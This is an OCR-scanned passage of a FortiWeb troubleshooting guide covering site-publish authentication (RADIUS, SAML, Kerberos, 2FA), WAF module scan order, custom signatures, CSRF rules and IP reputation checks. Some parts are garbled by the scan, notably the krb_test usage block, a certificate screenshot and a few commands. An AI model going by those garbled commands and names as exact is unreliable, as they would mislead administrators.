This problem is very common. Latency in the Internet, special or misconfigured topology often resultin
such issues.
« Ifthe traffic interaction complies with the application or protocol requirement and definition;
This method requires in-depth understanding of authentication protocols and state machine
interaction such as Radius, LDAP/LDAPS, SAML, etc. A simple way to narrow down the issue is
comparing the packet flow between a successful authentication and an unsuccessful access.
For some uncommon servers and user-defined servers, this way is useful to find the protocol
compatibility problem.

7. Some issues are related to browser behaviors. They might be issues that can be resolved by updating to
the latest version. You can also change a browser and try again.

If the browser does not prompt authentication window or form

When the authentication form is not prompted by the browser when visiting the target URL or Path, you can
check the following:

« Check if there is any missing configuration.

« Check if the correct site publish rule is included in site publish policy, and the policy is included in the
web protection profile used in the server-policy;

« Check if the Published Site & Path are correctly configured;
For regular expression, use the built-in Regular Expression Validator to confirm the published site
domain can be matched; for Path or URL, confirm it's case sensitive.

« Particularly, check if any remote server is included in the authentication Server Pool selected by the
site publish rule.

This is a common issue of configuration missing that often occurs in customers’ sites. Just remember to add
Remote Servers to a server pool used by a site publish rule.

« Check if the Path/URL matches URL Access rules.
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In 6.3 and later builds, URL Access Rule is processed before Site Publish, so if the certain URL/Path matches a
URL Access Rule with Action “Pass”, the site-publish rule will be skipped,

To resolve this issue, you can remove the conflicted URL Access Rule or configure the Action of the URL
Access Rule as “Continue”, then FortiWeb will continue processing the request and site publish rules will be
matched.

Sometimes if you suspect other WAF features cause the issue, you can check FortiWeb Admin Guide > Key
concepts > Sequence of scans to see if any other features processed prior to Site-Publish are configured.
You can remove the feature to try again.

If authentication fails

Authentication failures have different causes:
« Login user/password or token mistakes.

If the username, password, or token (2FA method) is wrong, the browser usually has kinds of behaviors such as
keeping a pop-up sign-in window, prompting “Invalid credentials” or “Login Failed” message.

« Check if remote server members in the Authentication Server Pool are reachable from FortiWeb.
If the remote server IP is not reachable, service port is unreachable (or incorrectly configured), or has other

configuration mistakes such as Radius server secret, one can make a quick judgment from the error messages
or browser behavior.

The error messages vary according to different client authentication methods or remote servers. For example,
the browser may keep popping up the Sign in window (HTTP Basic Authentication method), or the
Authentication Form will prompt a warning message like “Failed to connect LDAP server” or “RADIUS response
timeout”, etc.

IP unreachable or Invalid secret
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Authentication Required

Incorrect port
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Authentication Required

RADIUS response timeout

Please enter your RSA SecurlD to continue

Username: | |

Passcode: | |

IP or port unreachable

@ sign in

Failed to connect LDAP server
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Service not available

4 Outlook

User name:

Password:

@ sign in
Login Failed

You can check the connectivity and service availability issues with steps in above section: "Common
troubleshooting steps for Site-Publish issues: Check the connectivity & availability of remote servers for
authentication server pool".

« Check if the backend server configured in Authentication Delegation behaves as expected.

« Double confirm that the corresponding servers such as KDC server for authentication delegation is
correctly configured;

» Check if access to the backend server directly can be successful, rather than pass through FortiWeb.
« Change and test with a different Authentication Delegation type;
« For Form Based Delegation:
« If needed, clone the predefined templates, and edit the settings as your desire
« For Kerberos delegation:
« Please refer to the following section “Kerberos issues” for more details.
« Some special requirement or notes on configuration:

« For Two-factor site-publish rules, “Client Authentication Method” needs to be “HTML Form
Authentication”.

Two-factor authentication requires configuring the “Client Authentication Method” as “HTML Form
Authentication”.
When choosing “HTTP Basic Authentication”, the browser will keep on prompting the Sign in window,
because this browser-specific method cannot display a second authentication form that allows users
to enter a token code.

« When Authentication Delegation is "HTTP Basic" in Site Publish Rule, “Basic Authentication” should
be enabled in the backend 1IS while Forms Authentication should be disabled to avoid conflict. This is
a restriction from the IS side.

« Increase the auth-timeout when remote servers’ response is slow
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In the real environment, you may find the LDAP/Radius/SAML/NTLM/OAuth servers are slow to answer
authentication queries by analyzing diagnose logs or captured packets. You can adjust the authentication
timeout setting to prevent the query from failing.

configure system global
set auth-timeout <milliseconds int>
end

<milliseconds_int>is the number of milliseconds that FortiWeb will wait for the remote authentication
server to respond to its query. The valid range is 1-60,000 and the default value is 2000.

Besides Authentication server pool members for Site-Publish, this setting also affects remote authentication
queries for administrator accounts.

Two-factor authentication issues

Steps to troubleshoot two-factor authentication issues:

1. Check the Radius server configuration on FortiWeb; you can remove the 2FA configuration on the Radius
server and use “Test Radius” button to confirm;

2. Remove 2FA authentication configuration on the Radius server, check if authentication can be successful if
with only Radius;

3. Check FortiWeb configuration to ensure that “Client Authentication Method” is configured as “HTML Form
Authentication” in the site-publish rule;

4. Check logs on Radius server to see if any clear failure logs:

« Ifthe Radius server is FortiAuthenticator, please refer to the above section to check detailed logs: 4.2 >
Common troubleshooting > Check logs on the remote servers.

5. Capture packets on the front-end and back-end side. Analyze the traffic flow to see if any delays, response
loss or abnormal packets.

« Check if there is another request sent by the same client before the authentication process is done. An
extra request will interrupt 2FA process and result in cookie reset;

« A common example of such an extra request is favicon.ico. If it's the case, you can try to add a URL Access
rule to deny (Action is Deny) this request;

« Ifthere are other requests such as the ones generated by JS script in the web code, you may try to add a
URL Access rule to bypass (Action is Pass) this request

6. For further analysis, please also enable diagnose logs for site-publish simultaneously.

Refer to above section "Common troubleshooting steps for Site-Publish issues: Collect diagnose logs".

SAML issues

1. Most SAML issues are configuration issues.
You'd better double verify the configuration on both IDP side and SP/FortiWeb side:
FortiWeb > User > Remote Server > SAML Server:

« Entity ID: the unique identity of SP; the host is the domain name of vserver. The prefix must be https.
« IdP Metadata: upload a valid IdP metadata file, which is exported from the IdP;
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For any changes on the IdP, please export the metadata file and upload to FortiWeb again.

« IdP Entity ID: double confirm this ID displayed after the IdP metadata file uploaded is identical to that
shown on the IdP

« After SAML Server is configured, click Generate Service Provider Metadata to export a metadata file,
and import the file to IdP.

If you change any item of SAML server, you must regenerate Service Provider Metadata file and
reconfigure IDP. Particularly, please make sure the “Location” in the metadata file matches the “Published
Site” (Domain) configured in the Site-publish rule.

E.g.
<md:SingleLogoutService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-

POST" Location="https://portal.testdomain.com/new saml
server/saml.sso/SLO/POST"/>

On IdP Side (AD FS, FortiAuthenticator, etc.):

« SP Metadata: import the one generated on FortiWeb;
For any changes on SAML Server, it’s better to update this file again.

« Make sure the user information (UPN or Email) is mapped to EPPN (urn:0id:1.3.6.1.4.1.5923.1.1.1.6),
because FortiWeb uses the value of the EPPN attribute to identify users uniquely.

FortiWeb > Application Delivery > Site Publish > Site Publish Rule:

« The correct SAML Server is selected;
« The Published Site should be consistent with the host of SAML Server’s Entity ID.

2. Other checking points:

« AllldP and SP configuration are case sensitive;
« Make sure the clocks of all the related servers (DC, FortiWeb, IDP,etc.) are synchronized;

« For cross domain environments, if the AD Domain trusts each other, you can share one ADFS instance.
But if not, you would need one ADFS instance for each AD.

« IfIDP is ADFS, the global logout url is https://[<ADFS_Service_ FQDN>/adfs/Is/?wa=wsignout1.0

3. Enable and check diagnose logs:

# diagnose debug application site-publish 7
# diagnose debug timestamp enable
# diagnose debug enable

4. Collect SAML related logs with below steps for dev team analysis:

« Edit /data/etc/saml/shibboleth/*.logger, switch the default level on the top to DEBUG.

/data/etc/saml/shibboleth#cat shibd.logger
log4j.rootCategory=DEBUG, shibd log #The default level is WARN
/data/etc/saml/shibboleth#cat native.logger
log4j.rootCategory=DEBUG, native log #The default level is WARN

Note:Don’t forget to restore to the default level WARN to avoid performance issues.
« Restart proxyd & shibd
« Reproduce the issue
« Collect the logs under /var/log/shibboleth/. You may clear them before you test it

You can copy these logs to /var/og/gui_upload and download them from GUI.
~# 1ls -1 /var/log/shibboleth/

—rw-r—--r-- 1 root 0 9744 May 13 14:44 native.log
—rwW-r—--r-—- 1 root O 30712 May 13 14:44 shibd.log
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Kerberos issues

1. Check Kerberos related configuration

The most common issues caused by Kerberos authentication failures are also configuration mistakes. When
issues occur, you need to check the configuration on FortiWeb and the backend KDC server.

This section will not focus on configuration details for different KDC servers, but only introduce some general
considerations or mistakes in both FortiWeb & KDC settings.

FortiWeb > User > Remote Server > KDC Server:

« Delegated Realm: It should be all capitalized. It's the domain of the domain controller (DC) that the KDC
belongs to. Typically the UPN (User Principal Name) used for login has the format username@delegated_
realm.

« Shortname: An alias of the realm you specified. The shorthame can include the domain name of the realm
that is not fully qualified. With a shortname being configured, the format of UPN can be
username@shortname
A shortname is used in a scenario when the complete Kerberos realm (e.g. TEST.FortiWebDEMO.COM) is
different from what a client gets from their username (e.g. the username FortiWeb gets from the IDP is an
email address like (xxx@FortiWebDEMO.COM). If the customer can set the UPN as the username
returned to FortiWeb, shortname is not needed; otherwise, Forti\Web would have to set a shorthame to
make Kerberos work.

FortiWeb > Application Delivery > Site Publish > Site Publish Rule:

« There are two kinds of Authentication Delegation:

« Kerberos: also called the Regular or Basic Kerberos Delegation; available only when Client
Authentication Method is HTML Form Authentication or HTML Basic Authentication. You just need a
username&password for delegation.

« Kerberos Constrained Authentication: available when Client Authentication Method is Client
Certificate, SAML or NTLM. You just need UPN (User Principle Name); the delegator will help you get
access tickets.

« Delegated HTTP Service Principal Name (SPN): Make sure the Service Principal Name is configured
with exactly the same string and upper/lower case with that configured in AD; and, all realm such as the
domain name after @ should be upper case
The format is like:
<protocol >/<exchange server hostname>/<realm>

« protocol: http

« exchange server hostname: USER-LHLGG566PO0 (case-insensitive), you may also use the full name
USER-U3LOJFPLH1.FortiWebdemo.com

« realm: FortiWebDEMO.COM; should be capital
E.g. http/USER-U3LOJFPLH1.Fortiwebdemo.com@FortiWebDEMO.COM

« Default Domain Prefix Support: For Regular Kerberos delegation only. The domain controller usually
requires users to log in with the username format domain\username such as EXAMPLE\user1.
Alternatively, enable this option and enter EXAMPLE for Default Domain Prefix, the user enters user1 for
the username value and FortiWeb will automatically add EXAMPLEN\ to the HTTP Authorization: header
before it forwards it to the web application

« Keytab File: For Kerberos Constrained Delegation only. Select the keytab file configuration for the AD user
that FortiWeb uses to obtain Kerberos service tickets for clients.
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For instructions on how to generate the keytab file, see FortiWeb Admin Guide > Application Delivery > Site
Publishing > Creating an Active Directory (AD) user for FortiWeb - Keytab File.

« Service Principal Name for Keytab File: For Regular Kerberos delegation only. It's the SPN that you
used to generate the keytab specified by Keytab File. Don'’t forget the realm suffix.

Particular requirement for Client Certification Authentication:

« Double check that Client Certificate Verification is correctly configured and bound to the server-policy.

« For Username Location in Certificate in Site Publish rule, here’s an example.

The username we need is cert1@fwbdev.com, then you may specify the location you want, Subject or
Subject Alternative Name (SAN). However, the most exact one is UPN (aka Other Name > Principal Name)
in SAN, so you’d better keep the default.

Certificate Certificate @
| General | Details | Certification Path| General | Details | Certification Path|
Show: [ <all> - show: [ <all> -
Field Value Field Value
I :_Issuer fwhdey-USER-LHLGGSA6EPO-C. . I :_CRL Distribution Points [1)CRL Distribistion Paint: Distr...
I i __‘.-'ali\i from 2014511 120 16:06:59 I !;,- _‘Authuity Information Access  [1]Authority Info Access: Acc...
| Ivalid to 2015511 5120 16:06:59 s 15 [Enhanced key Usage Encrypting Fle System (1.3.6....
| | Subject cert1@fwbdev.com, certl, Us... ] Subject Alternative Name Other Name:Principal Name=c. ..
| |publc key RSA (1024 Bits) i [key Usage Digital Signature, Key Encipher..,
!g | Certificate Templste Name User I | Thumbgrint algarithm shal £
151 [sMIME Capabiities [115MIME Capability: Object L. |- Phuumbgrint a53a4lcl fE6E2499F D654 ..,
Vel guhiact ¥ Tdentifier M N4GARTAl Bl QA2 Aa | i
£ = cert1@Fwbdev.com [Cther Name:
CN = cert1 | principal Name=cert1@fwbdev.com
CN = Users RFC822 Namemcert 1@Fwbdev.com
DC = fwbdey
DC = com
_. Edit Properties... Copy boFile... _. Edit Properties... Copy boFile...
Learn more sbout certificate detals Learn more sbout certificate detals
r— — :

Some Tips on KDC servers:

« Create an http-delegator which is a domain account to do authentication delegation. Please refer to
Fortiweb Admin Guide > Application Delivery > Site Publishing > Creating an Active Directory section for

details.

« Make sure the account & its password never expire.
« Don'tuse $setspn -A .... Instead, use $setspn -S ... to create SPN for the account

2. Other checking points:

Make sure the clocks of all the related servers (DC, FortiWeb, IDP,etc.) are synchronized, otherwise Kerberos

tickets will be invalid.

3. Collect information for further investigation:

Diagnose logs when the issue happens:

# diagnose debug application site-publish 7
# diagnose debug timestamp enable

# diagnose debug enable

4. Test with FortiWeb backend tool krb_test and collect the output:
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« Login to FortiWeb backend shell.

Here is the usage below:

ver SPN> [options] -h <

host header
= SSL tunnel
erberos spnego (default krb3)
: client certificate file (PEM or DER)
-e: client private key file (ditto)
-a: port of web acc default:
: connection timeout (default:

er UPN= -p
legated UPH

http/websery - L1E /ow
- 3 f -u

-k delegator.keytab

Note:
-s: the same with Delegated HTTP Service Principal Name

-h: IP or domain name of the backend web server (aka pserver); if you use -H, the value of Host header in
request will be overwritten.

-t: Use SSL tunnel for the backend web server. -c and -e are used for client certificate authentication
for basic Kerberos:

-u: UPN for login, and the format must be username@DOMAIN.COM

-p: it's password

for KCD:

-u: ditto

-n: delegator’'s UPN, it's the same with Service Principal Name for Keytab File

-k: file path of your keytab file in FortiWWeb (you should upload it first)

An example of the successful result: (response returns 200 OK)

If the test fails, that means there are some problems in Kerberos authentication or backend communication.
Please note the debug information on the screen.
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If the test succeeds, that means configuration or login input may be incorrect. Need to check them and keep the
parameters consistent with those in krb_test.

Web Protection - General Issues

« Why cannot hidden fields work fine with offline mode?
« FAQ
o What's the sequence of WAF module scans in 7.0.0?

FAQ

Why cannot hidden fields work fine with offline mode?

One of the following two conditions must be met with offline mode.
1) The HTTP request and response is in the same TCP session.

2) The Session Key configured in offline profile (if not configured, ASPSESSIONID, PHPSESSIONID, or
JSESSIONID) must be used in HTTP.

Why doesn’t a WAF protection module work?

Some modules can disable other modules, such as URL access. When a certain module does not work, we
should think about this. Here are some examples.

1) When URL access action is Pass, it can disable all security features after Global Object White List & URL
Access, please refer to the module sequence in the following FAQ item.

2) IP white list can disable all security features after IP List Check.

3) When matched known engine, WAF will disable some RBE related features and all modules that may cause
false positives. These modules are listed as follows

HTTP Flood

HTTP Access Limit

Custom Access Policy
GEOIP

Malicious IP
HTTP_Protocol Constraints
Robot Check

Bot Deception

Biometrics Based Detection
Threshold Based Detection

4) Some OWA URLs will result in errors, so FortiWeb will disable these modules below.
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All response followup modules are disabled
File Security

Webshell Detection

Chunk Decode

File Uncompress

Signature

URL Rewriting

File Compress

Machine Learning

What’s the sequence of WAF module scans in 7.0.0?

The WAF module scan sequence in 7.0.0 is shown as below for your reference:
WAF_X_FORWARD_FOR,
WAF_SESSION_MANAGEMENT, //Client management
WAF_IP_LIST_CHECK,
WAF_IP_INTELLIGENCE,
WAF_QUARANT _IP,
WAF_BOT_MITIGATION_MOD,
WAF_BOT_MANAGEMENT,
WAF_GEO_BLOCK_LIST,
WAF_HTTP_WEBSOCKET_SECURITY,
WAF_HSTS_HEADER,
WAF_PROTECTED_SERVER_CHECK,
WAF_ALLOW_METHOD_CHECK,
WAF_ACTIVE_SCRIPT,
WAF_MOBILE_IDENTIFICATION,
WAF_HTTP_DOS_HTTP_FLOOD,
WAF_HTTP_DOS_MALICIOUS_|IP,
WAF_HTTP_ACCESS_LIMIT,
WAF_TCP_FLOOD_PREVENTION,
WAF_HTTP_AUTHENTICATION,
WAF_GLOBAL_WHITE_LIST,
WAF_ADFS_PROXY,
WAF_CUSTOM_RESPONSE_POLICY,
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WAF_URL_ACCESS_POLICY,
WAF_MOBILE_API_PROTECTION,
WAF_PADDING_ORACLE_POLICY,
WAF_HTTP_PROTOCOL_CONSTRAINS,
WAF_FILE_PARSE,
WAF_FILE_UPLOAD,
WAF_WEBSHELL_DETECTION,
WAF_CHUNK_DECODE,
WAF_FILE_UNCOMPRESS,
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WAF_WEB_CACHE, // NOTE: it has to be placed before the modules which will modify the original packs

WAF_BOT_DECEPTION,

WAF_ROBOT_CHECK, // ML bot detection
WAF_CSRF_CHECK,

WAF_MITB_CHECK,
WAF_PARAMETER_VALIDATION_RULE,
WAF_AJAX_BLOCK,

WAF_BOT_CLIENT, //Biometric based bot detection
WAF_WEB_ACCELERATION,
WAF_XML_VALIDATION,
WAF_JSON_VALIDATION,
WAF_SERVER_PROTECTION_RULE, // Signature
WAF_SYNTAX_BASED_DETECTION,
WAF_SITE_PUBLISH,

WAF_THREAT_WEIGHT,

WAF_HIDDEN_FIELDS,
WAF_CUSTOM_ACCESS_POLICY,

WAF_BOT_CUSTOM_ACCESS, // Threshold based bot detection

WAF_USER_TRACKING,
WAF_API_MANAGEMENT,
WAF_OPENAPI_VALIDATION,
WAF_CORS_CHECK,
WAF_URL_REWRITING_POLICY,
WAF_URL_ENCRYPTION,

WAF_MLEARNING, // Machine Learning framework
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WAF_API_RECORD, //Machine Learning API discovery
WAF_FILE_COMPRESS,

WAF_COOKIE_SECURITY,
WAF_HTTP_HEADER_SECURITY,

WAF_PROFILE,

WAF_HTTP_STATISTIC,
WAF_CLIENT_CERTIFICATE_FORWARD

Web Protection - Known Attack

« How do | create a custom signature that erases response packet content?

« What ID numbers do | use to specify a Signature Violation filter when | use the CLI to create a custom
access rule?

« How do | reduce false positives and false negatives?

FAQ

How do | create a custom signature that erases response packet content?

For 6.4.0 and later releases, we don’t recommend to use custom signatures to modify packets because
signature is designed to detect malicious patterns instead of changing packet, and the erasing action of
signature is actually masking, not deleting.

Please use “URL rewrite” to delete response header or mask response body for any releases after 6.4.0. Please
refer to FortiWeb Administration Guide > Application Delivery > Rewriting & Redirecting for details.

For releases before 6.4.0, do the following.

1. Create a custom signature rule that includes the following values:

Direction Response

Expression Either a simple string or a regular expression that matches the response
to erase.

Action Alert & Erase
The erase action replaces the content specified by Expression with
XXX.

2. Add an appropriate target:
« RESPONSE_BODY
« RESPONSE_HEADER
« RESPONSE_STATUS
The RESPONSE_STATUS is not erased in the raw packet.
If the target is RESPONSE_HEADER or RESPONSE_STATUS, the body of the response is still displayed.
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3. Add the rule to a custom signature group, and then add the group to a signature policy that you can add to
an inline or Offline Protection profile.

For detailed custom signature creation instructions, see "Defining custom data leak & attack signatures" in
FortiWeb Administration Guide.

What ID numbers do | use to specify a Signature Violation filter when | use the
CLI to create a custom access rule?

Thewaf custom-access rule command allows you to configure custom access rules, which can include
Signature Violation filters. When you configure the signature-class option, use one of the following IDs to
specify the category of signature to match:

Cross Site Scripting 01000000
Cross Site Scripting (Extended) 02000000
SQL Injection 03000000
SQL Injection (Extended) 04000000
Generic Attacks 05000000
Generic Attacks (Extended) 06000000
Known Exploits 09000000

For example, the following command creates a custom rule that detects SQL injection attacks, such as blind
SQL injection:

config waf custom-access rule
edit "sgl-inject"
set action block-period
set severity High
set trigger "notification-serversl"
config signature-class
edit 03000000
set status enable
next
end
next
end
config waf custom-access policy
edit "sgl-inject-policy"
config rule

edit 1
set rule-name "sgl-inject"
next
end
next
end

For more information onthe waf custom-access rule command, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/
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How do | reduce false positives and false negatives?

If FortiWeb is identifying legitimate requests as attacks (false positives), complete the following troubleshooting
steps:

1.

If your web protection profile uses a signature policy in which the extended version of a signature set is
enabled (for example, Cross Site Scripting in FortiWeb Administration Guide), disable it.

The extended signature sets detect a wider range of attacks but are also more likely to generate false
positives.

For details, see "Blocking known attacks & data leaks" in FortiWweb Administration Guide.

Specify the appropriate URL as an exception in the signature configuration. To create this exception, click
either the Exception link in the Message field of the attack log item or Advanced Mode in the Edit
Signature Policy dialog box.

For details, see "Configuring action overrides or exceptions to data leak & attack detection signatures” in
Fortiweb Administration Guide.

If the configuration changes do not solve the problem, capture the packet that FortiWeb has incorrectly
identified as an attack and contact Fortinet Technical Support for assistance.

Fortinet can resolve the issue by modifying the attack signature.

If FortiWeb is identifying attacks as legitimate requests (false negatives), complete the following troubleshooting
steps:

1.

Use the Advanced Mode option to ensure that the signature policy that your web protection profile uses
has the following configuration:

« Allthe appropriate signatures are enabled.

« The enabled signatures do not have exceptions that permit the attack packets.
If your signature configuration is correct, capture the packet that FortiWeb did not identify as an attack and
contact Fortinet Technical Support for assistance.
Fortinet can resolve the issue by adding an attack signature. In the meantime, you can resolve the problem
by creating a custom signature. For details, see "Defining custom data leak & attack signatures" in
Fortiweb Administration Guide.

For additional information about reducing false positives, see "Reducing false positives" in FortiWeb
Administration Guide.

Web Protection - Advanced Protection

FortiWeb Trouble-shooting Guide

Why does my Advanced Protection rule that has both Signature Violation and HTTP Response Code filters
not detect any violations?

What's the difference between the Packet Interval Timeout and Transaction Timeout filters in an Advanced
Protection rule? on page 120

Why is the Signature Violation filter | added to my Advanced Protection custom rule not working? on page
120

How do | prevent cross-site request forgery (CSRF or XSRF) with a custom rule? on page 121
Why a URL access rule doesn’t work? on page 122

Why are requests still forwarded to backend servers when the client IP has been already blocked? on page
122

Which modules support Client ID based period block and which modules do not support? on page 122
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o Why doesn't MITB work? on page 123
« Why does WSDL import fail? on page 123
« Why doesn't WSDL Validation work? on page 124

FAQ

Why does my Advanced Protection rule that has both Signature Violation and
HTTP Response Code filters not detect any violations?

When you use Web Protection > Advanced Protection > Custom Policy > the Custom Rule tab to create
a custom rule, FortiWeb links items in the list of filters with an AND operator. It uses the rule to evaluate both
requests and responses. When the rule has both a Signature Violation and a HTTP Response Code filter, a
malicious request violates the signature filter and the corresponding response matches the response code filter.
But neither the request nor the response can violate both filters at the same time to generate a match.

To solve this problem, create a separate custom rule for each type of filter. For details, see "Combination access
control & rate limiting" in FortiWeb Administration Guide.

What's the difference between the Packet Interval Timeout and Transaction
Timeout filters in an Advanced Protection rule?

Both Packet Interval Timeout and Transaction Timeout protect against DoS attacks. In most cases, the attacks
are some form of slow HTTP attack.

Packet Interval Timeout evaluates the time period between packets that arrive from either the client or server
(request or response packets). If the time exceeds the maximum the timeout specifies, FortiWeb takes the
action specified in the rule.

However, other types of slow attacks can keep the server occupied and still maintain a minimal data flow. For
example, if an attack sends a byte of data per second, it can continue a GET request indefinitely but stay within
the Packet Interval Timeout.

The Transaction Timeout evaluates the time period for a transaction—a GET or POST request and its complete
reply. In most cases, a transaction lasts no longer than a few milliseconds or, for slower applications, a few
seconds.

To detect the widest range of attacks, specify both Packet Interval Timeout and Transaction Timeout filters
when you create an Advanced Protection rule.

For details, see "Combination access control & rate limiting" in FortiWeb Administration Guide.

Why is the Signature Violation filter | added to my Advanced Protection custom
rule not working?

To add a Signature Violation filter to an Advanced Protection custom rule, you select Signature Violation as
the filter type.

However, for the filter to work, the following configuration steps are also required:
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« Inthe Edit Custom Rule dialog box, select at least one signature category. By default, no categories are
selected. When you select a category, FortiWeb prompts you to enable all or some of the signatures in the
category.

« Ensure that the signatures that correspond to the categories you selected in the rule are enabled in the
signature policy (Web Protection > Known Attacks > Signatures).

You select the custom policy that contains the rule and corresponding signature set when you create a
protection profile.

For details, see "Combination access control & rate limiting" and "Blocking known attacks & data leaks" in
FortiWeb Administration Guide.

How do | prevent cross-site request forgery (CSRF or XSRF) with a custom rule?

A cross-site request forgery attack takes advantage of the trust that a site has in a client’s browser to execute
unwanted actions on a web application.

You can add CSRF protection rules or combine it with other methods to protect CSRF/XSRF attacks:

To create a CSRF protection rule to protect against CSRF/XSRF attack. (Recommended)

1. Enable the attribute “Same Site” in Cookie Security. This attribute will declare that your cookie should be
restricted to a first-party or same-site context.

2. Check “Referer” in custom rule.

Note: The first method (adding CSRF protection rule) is the most effective. Adding a custom rule with “Referer”
header to detect CSRF is very ineffective and can be bypassed easily. However, if needed you can combine two
or all of the methods.

To add an advanced access control rule that detects cross-site request forgery (CSRF)

1. Goto Web Protection > Advanced Protection > Custom Policy, and select the Custom Rule tab.
2, Click Create New.
3. Configure the action and trigger settings for the rule.

For detailed information on these settings, see "Combination access control & rate limiting" in FortiWeb
Administration Guide.

4. Click Create New to add arule entry.
For Filter Type, select HTTP Header, and then click OK.
6. Configure these settings:

o

Header Name Referer

Header Value Type Regular Expression

Header Value A regular expression that matches the address of your website.
For example, if your website is http://211.24.155.103/, use the following
expression:

Ahttp://211\.24\.155\.103.*

7. Click OKto save the rule entry, and then click OK to save the rule.

8. Goto Web Protection > Advanced Protection > Custom Policy, and select the Custom Policy tab to
group the custom rule into a policy.
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Why a URL access rule doesn’t work?

122

For details about creating policies, see "Combination access control & rate limiting" in FortiWeb

Administration Guide.

To apply the policy, select it as the Custom Policy in a protection profile. For details, see "Configuring a
protection profile for inline topologies" or "Configuring a protection profile for an out-of-band topology or

asynchronous mode of operation" in FortiWeb Administration Guide.

Attack log messages contain Custom Access Violation when this feature detects an unauthorized

access attempt.

Please check:

1) The URL Pattern value in a URL access rule shouldn’t include the parameter part. That is to say that the

value here only matches against the URL string before the question mark.

2) URL access rules may be skipped by previous rule if previous rule has been matched because all of the rules
are checked by their sequences.

Why are requests still forwarded to backend servers when the client IP has been
already blocked?

Please check:

1) Period block IP only works on new TCP connections. If there are requests on the old TCP connection which
was established before the IP be blocked, the request on the old TCP connection will still be forwarded.

2) Customers can choose Client ID based period block for images after 7.0.0. This kind of period block will drop

the requests on the old TCP connection.

Which modules support Client ID based period block and which modules do not
support?

The modules below support Client ID based period block from 7.0.0:

http-request-flood-prevention-rule
user-tracking rule

xml-validation rule

json-validation rule
openapi-validation-policy
csrf-protection

bot-deception

input-rule

custom-protection-rule

signature

api-rules
syntax-based-attack-detection
http-protocol-parameter-restriction
webshell-detection-policy
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« file-upload-restriction-policy

« threshold-based-detection policy

« custom-access rule

e COOKie-security

« site-publish-helper policy

« mobile-api-protection mobile-api-protection-rule
« url-encryption url-encryption-rule

« bot-detection-policy

« known-bots — only bad bot need support

These modules do not support Client ID based period block from 7.0.0:

« padding-oracle - IP-based statistics

« layerd-access-limit-rule - IP-based statistics

« layer4-connection-flood-check-rule — IP-based statistics
« ip-intelligence — IP-based only

« machine-learning-policy

« http-connection-flood-check-rule — IP based

« ftp-file-security

« ftp-command-restriction-rule

Why doesn't MITB work?

Please check:
1) Make sure the request URL matches that rule and the response page is in HTML format with status code 200.

2) Make sure there’s a form tag in the response HTML page and the form’s action URL matches the POST URL
in MITB rule.

3) Make sure the type of password input tag is “password” indeed, or FortiWeb’s MITB script can’t locate the
password.

4) Make sure the value of the Content Security Policy header doesn’t block the execution of FortiWeb's MITB
script.

Why does WSDL import fail?

Below are several common non-bug reasons:
1) When WSDL imports a local schema, the schema should be uploaded to FortiWeb first.
2) When WSDL imports a schema from network, FortiWWeb should be able to access the network.

3) If the GUI alerts that the WSDL format is incorrect, you should correct the format before uploading. There is a
website for verifying the WSDL format:

https://www.wsdl-analyzer.com/
4) The max import/include schema level is limited to 256.

Also, you can see the specific error information returned by the GUI.
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Why doesn't WSDL Validation work?

There are often similar questions caused by incorrect configuration. For WSDL validation, the configurations
should be the same between WSDL and the device.

1) The request url of the XML protection rule should be the same as the url of WSDL location.
2) The backend IP/domain of the device should be the same with the IP/domain of WSDL location.
3) The backend port of the device should be the same with the port of WSDL location.

The above three points can confirm the only service on the network.

Web Protection - Input Validation

« Why sometimes fail to upload files to the server when file security is enabled? on page 124
« Why does file security not work? on page 124

« Why does the server receive packets from the client even if parameter validation deny is triggered? on
page 124

FAQ

Why sometimes fail to upload files to the server when file security is enabled?

Check if 'Hold Session While Scanning File' is enabled first. When it is enabled, FortiWeb will upload files to
FortiSandbox and wait for scan results before sending the file to the server. This process may take some time,
please check if the server will disconnect while waiting.

Why does file security not work?

FortiWeb parses files up to 5M by default, and if it exceeds 5M, the requests will be bypassed.

If you want to increase this value, please configure it as below.

config system antivirus
set uncomp-size-limit 102400
end

Why does the server receive packets from the client even if parameter validation
deny is triggered?

When a HTTP request is divided into multiple TCP packets, before the packet which includes the denied
parameter appears, the previous TCP packets will still be transmitted to the server.
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Web Protection - Bot Mitigation

« Why can't| see the bot_client.js be injected into the response page for Biometric Based Detection? on page
125

FAQ

Why can't | see the bot_client.js be injected into the response page for Biometric
Based Detection?

Please check from two aspects:
1) Double check if the request matches the rule or not.

2) Be aware that if the client is considered as not a bot, its good client status will be kept for 30 minutes. So
FortiWeb won’t do biometric based checking to this client within 30 minutes.

Web Protection - APl Protection

« Why do | get an error message “Not a valid YAML file for OpenAPI” while uploading a valid YAML file on the
“OpenAPI file” page? on page 125

FAQ

Why do | get an error message “Not a valid YAML file for OpenAPI” while
uploading a valid YAML file on the “OpenAPI file” page?

An OpenAPI document may be represented either in JSON or YAML format. FortiWeb only supports OpenAPI
files written in YAML format. A valid OpenAPI document not only conforms to YAML syntax but also to the
OpenAPI Specification. You can utilize Swagger Editor to validate your OpenAPI document online/offline:
https://swagger.io/docs/open-source-tools/swagger-editor/ for more details.

Web Protection - IP Protection

« Why do | get an error message “Not a valid YAML file for OpenAPI” while uploading a valid YAML file on the
“OpenAPI file” page? on page 125

« How to troubleshoot GEO IP false positives/false negatives? on page 126
« Why are GEO-IP locations different from FortiGuard? on page 126
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FAQ

How to troubleshoot IP Reputation false positives/false negatives?

We generally follow below process to troubleshoot:
1) Check if the IP reputation database (IRDB) is upgraded to the latest.
Please check via System > Config > Fortiguard > License information > IP Reputation.

2) If the IRDB is the latest, use below shell cmd on FortiWeb to check if the IP could match the IRDB on the
device.

FortiWeb # fn sh

~# bonet test /var/log/irdb sig.db 1.1.1.1

ip count = 139727, all types[botnetvl|botnet|proxy|phishing|spam|tor|others]
CategoryIdName 1 Botnet

CategoryIdName 2 Anonymous Proxy
CategoryIdName 3 Phishing
CategoryIdName 4 Spam
CategoryIdName 5 Others

CategoryIdName 6 Tor
IP unmatch in irdb.

3) If the cmd shows unmatch, then FortiWeb needs to notify the IRDB team to check if this IP needs to be added
to IRDB in the next version.

4) If the cmd shows matched, then maybe IRDB was disabled by other modules.

How to troubleshoot GEO IP false positives/false negatives?

Follow below process to troubleshoot:
1) Check if the GEO DB is upgraded to the latest.
Please check via System > Config > Fortiguard > License information > GEO DB.

2) If GEO DB is upgraded to the latest, then FortiWeb needs to notify the GEODB team to check if this IP needs
to be modified for the next GEODB release.

Why are GEO-IP locations different from FortiGuard?

